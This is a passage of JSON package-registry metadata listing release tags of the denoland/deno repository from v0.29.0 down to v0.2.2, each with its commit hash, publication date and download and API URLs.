GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/de